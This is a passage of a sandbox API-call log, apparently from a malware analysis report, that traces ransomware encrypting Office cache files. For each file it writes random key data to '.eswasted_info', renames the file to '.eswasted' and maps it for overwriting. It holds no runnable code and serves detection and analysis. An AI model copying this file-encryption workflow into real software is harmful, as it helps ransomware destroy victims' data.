out: pbBuffer=0x121ff08) returned 1 [0070.973] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.973] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 77 [0070.973] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a4) returned 0x4de2e8 [0070.973] lstrcpyW (in: lpString1=0x4de382, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.973] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0070.973] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0070.974] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0070.974] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.974] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.974] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.975] SetEndOfFile (hFile=0x110) returned 1 [0070.975] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.975] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0070.975] lstrcpyW (in: lpString1=0x4de382, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.975] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.eswasted")) returned 1 [0070.979] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0070.979] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0070.979] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x6a3b [0070.979] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6a3b) returned 0x2d0000 [0070.980] CloseHandle (hObject=0x120) returned 1 [0070.983] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0070.983] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4e1b00 | out: pbBuffer=0x4e1b00) returned 1 [0070.983] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.983] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0070.984] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.984] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.993] SetEndOfFile (hFile=0x110) returned 1 [0070.995] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x506f40 | out: hHeap=0x4a0000) returned 1 [0070.995] CloseHandle (hObject=0x110) returned 1 [0070.996] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de2e8 | out: hHeap=0x4a0000) returned 1 [0070.996] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de610 | out: hHeap=0x4a0000) returned 1 [0070.997] _aulldvrm () returned 0x0 [0070.997] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0070.997] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.997] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.997] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 76 [0070.997] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4de2e8 [0070.997] lstrcpyW (in: lpString1=0x4de380, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.998] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0070.998] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0070.998] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0070.998] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.998] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.999] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.000] SetEndOfFile (hFile=0x110) returned 1 [0071.000] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.000] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.000] lstrcpyW (in: lpString1=0x4de380, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.000] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.eswasted")) returned 1 [0071.000] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0071.000] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0071.001] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x10676 [0071.001] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10676) returned 0xb10000 [0071.001] CloseHandle (hObject=0x11c) returned 1 [0071.008] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0071.009] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4e1b00 | out: pbBuffer=0x4e1b00) returned 1 [0071.009] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.009] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0071.010] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0071.010] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.018] SetEndOfFile (hFile=0x110) returned 1 [0071.020] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x506f40 | out: hHeap=0x4a0000) returned 1 [0071.020] CloseHandle (hObject=0x110) returned 1 [0071.021] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de2e8 | out: hHeap=0x4a0000) returned 1 [0071.021] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de708 | out: hHeap=0x4a0000) returned 1 [0071.021] _aulldvrm () returned 0x0 [0071.021] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0071.022] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0071.022] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.022] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0071.022] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4de2e8 [0071.022] lstrcpyW (in: lpString1=0x4de380, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.022] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.022] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0071.075] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.075] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.075] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.075] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.076] SetEndOfFile (hFile=0x110) returned 1 [0071.076] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.076] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.076] lstrcpyW (in: lpString1=0x4de380, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.076] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0071.077] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0071.077] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0071.077] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x2488 [0071.077] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2488) returned 0x2d0000 [0071.077] CloseHandle (hObject=0x120) returned 1 [0071.080] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0071.081] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef7b8 | out: pbBuffer=0x4ef7b8) returned 1 [0071.081] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.081] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0071.081] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0071.082] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.090] SetEndOfFile (hFile=0x110) returned 1 [0071.092] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.092] CloseHandle (hObject=0x110) returned 1 [0071.093] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de2e8 | out: hHeap=0x4a0000) returned 1 [0071.093] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de800 | out: hHeap=0x4a0000) returned 1 [0071.093] _aulldvrm () returned 0x0 [0071.093] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0071.094] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0071.094] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.094] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 78 [0071.094] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a6) returned 0x4e1ab8 [0071.094] lstrcpyW (in: lpString1=0x4e1b54, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.094] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.094] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0071.095] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.095] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.095] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.095] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.096] SetEndOfFile (hFile=0x110) returned 1 [0071.096] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.096] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.096] lstrcpyW (in: lpString1=0x4e1b54, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.096] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.eswasted")) returned 1 [0071.098] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0071.098] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0071.098] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0xe00 [0071.098] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe00) returned 0x2d0000 [0071.098] CloseHandle (hObject=0x11c) returned 1 [0071.100] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0071.101] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef7b8 | out: pbBuffer=0x4ef7b8) returned 1 [0071.101] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.101] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0071.102] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0071.102] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.111] SetEndOfFile (hFile=0x110) returned 1 [0071.113] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.113] CloseHandle (hObject=0x110) returned 1 [0071.114] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0071.114] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de8f8 | out: hHeap=0x4a0000) returned 1 [0071.114] _aulldvrm () returned 0x0 [0071.114] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0071.115] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0071.115] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.115] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 93 [0071.115] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2c4) returned 0x4e1ab8 [0071.115] lstrcpyW (in: lpString1=0x4e1b72, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.115] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.115] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0071.116] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.116] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.116] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.123] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.124] SetEndOfFile (hFile=0x110) returned 1 [0071.125] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.125] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.125] lstrcpyW (in: lpString1=0x4e1b72, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.125] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.eswasted")) returned 1 [0071.143] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0071.143] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0071.143] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x545 [0071.143] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x545) returned 0x2d0000 [0071.143] CloseHandle (hObject=0x120) returned 1 [0071.146] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0071.147] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef7b8 | out: pbBuffer=0x4ef7b8) returned 1 [0071.147] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.147] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0071.148] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0071.148] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.156] SetEndOfFile (hFile=0x110) returned 1 [0071.158] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.158] CloseHandle (hObject=0x110) returned 1 [0071.159] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0071.159] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4da248 | out: hHeap=0x4a0000) returned 1 [0071.159] _aulldvrm () returned 0x0 [0071.159] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0071.160] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0071.160] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.160] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 92 [0071.160] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2c2) returned 0x4e1ab8 [0071.160] lstrcpyW (in: lpString1=0x4e1b70, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.160] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.160] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0071.161] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: 